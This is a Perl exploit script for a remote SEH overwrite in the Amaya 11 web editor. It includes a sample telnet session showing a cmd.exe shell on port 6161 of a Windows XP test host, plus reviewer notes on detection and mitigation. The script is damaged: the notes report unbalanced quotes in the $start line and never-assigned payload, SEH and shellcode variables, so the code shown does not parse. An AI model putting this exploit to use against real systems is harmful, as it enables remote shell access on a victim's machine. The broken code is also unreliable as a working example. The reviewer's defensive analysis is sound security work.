#!/usr/bin/perl
#
# Title: Amaya Web Editor 11 Remote SEH Overwrite Exploit
#
# Summary: Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web.
#
# Product web page: http://www.w3.org/Amaya/
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Reference: http://www.milw0rm.com/exploits/7906
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# 30.01.2009
#
#------------------------------------------------------------------
#
# lqwrm@zeroscience:~$ telnet 192.168.1.101 6161
# Trying 192.168.1.101...
# Connected to 192.168.1.101.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Amaya\WindowsWX\bin>dir
# Volume in drive C is System
# Volume Serial Number is D484-8540
#
# Directory of C:\Program Files\Amaya\WindowsWX\bin
#
# 29.01.2009 19:27 .
# 29.01.2009 19:27 ..
# 16.12.2008 14:44 5.816.320 amaya.exe
# 16.12.2008 14:41 1.290.240 thotprinter.dll
# 19.08.2008 11:02 135.168 wxbase28u_net_vc_custom.dll
# 19.08.2008 11:01 1.220.608 wxbase28u_vc_custom.dll
# 19.08.2008 11:02 135.168 wxbase28u_xml_vc_custom.dll
# 19.08.2008 11:03 741.376 wxmsw28u_adv_vc_custom.dll
# 19.08.2008 11:03 286.720 wxmsw28u_aui_vc_custom.dll
# 19.08.2008 11:01 3.018.752 wxmsw28u_core_vc_custom.dll
# 19.08.2008 11:02 49.152 wxmsw28u_gl_vc_custom.dll
# 19.08.2008 11:02 524.288 wxmsw28u_html_vc_custom.dll
# 19.08.2008 11:03 593.920 wxmsw28u_xrc_vc_custom.dll
# 11 File(s) 13.811.712 bytes
# 2 Dir(s) 7.520.141.312 bytes free
#
# C:\Program Files\Amaya\WindowsWX\bin>
#
#------------------------------------------------------------------
#
# Reviewer notes
#
# Purpose: writes one HTML file, named by $file, into the current directory.
# Its content is $payload, the concatenation of $start, $junk, $next_seh,
# $seh, $nop, $sc and $end.
#
# State of this copy: it is incomplete and does not parse. The $start
# assignment below has unbalanced quotes, and $junk, $next_seh, $seh, $nop,
# $sc and $end are never assigned anywhere on the page. Presumably the markup
# literals and everything between them were stripped as HTML when the page
# was extracted -- confirm against the referenced advisory.
#
# What the transcript shows: a cmd.exe prompt answers on TCP port 6161 of the
# test host, with the Amaya bin directory as its working directory. That is
# consistent with a listening shell started from inside the amaya.exe process
# after the generated file is opened (inferred from the transcript; the
# payload bytes are not in this copy).
#
# Detection: a document editor that opens a listening socket, or that starts
# cmd.exe, is not normal behaviour; either event on amaya.exe is worth an
# alert.
#
# Mitigation: overwriting a structured-exception-handler record is hindered
# by SafeSEH-linked modules, SEHOP and DEP. The platform named in the header,
# Windows XP SP2, has no SEHOP.
#
#------------------------------------------------------------------

# NOTE(review): damaged statement. The string literals are empty and the
# single quote that opens the third literal is never closed on this line, so
# the intended value of $start cannot be read from this copy.
my $start = "" . "\n" . '" . "\n" . "";

# Name of the output file; it is interpolated into the open() mode string below.
my $file= "Slumdog_Millionaire.html";

# $payload is assigned without `my`, and the script has no `use strict` or
# `use warnings`, so the six unassigned variables would interpolate as empty
# strings without any diagnostic.
# NOTE(review): the literal is "$sc " with a space before the closing quote;
# whether that space is original or an extraction artifact cannot be told
# from here.
$payload = "$start" . "$junk" . "$next_seh" . "$seh" . "$nop" . "$sc " . "$end";

# Two-argument open on a bareword filehandle: the mode character and the path
# share one string. $file is a constant here, so nothing external reaches the
# mode, but the three-argument form with a lexical handle is the safe habit.
open (exploit, ">./$file") or die "Can't open $file: $!";

# The results of print and close are not checked, so a failed or short write
# goes unnoticed.
print exploit "$payload";
close (exploit);

# Printed unconditionally once open() has succeeded, including when the write
# above failed.
print "\t\n - $file successfully created!\n";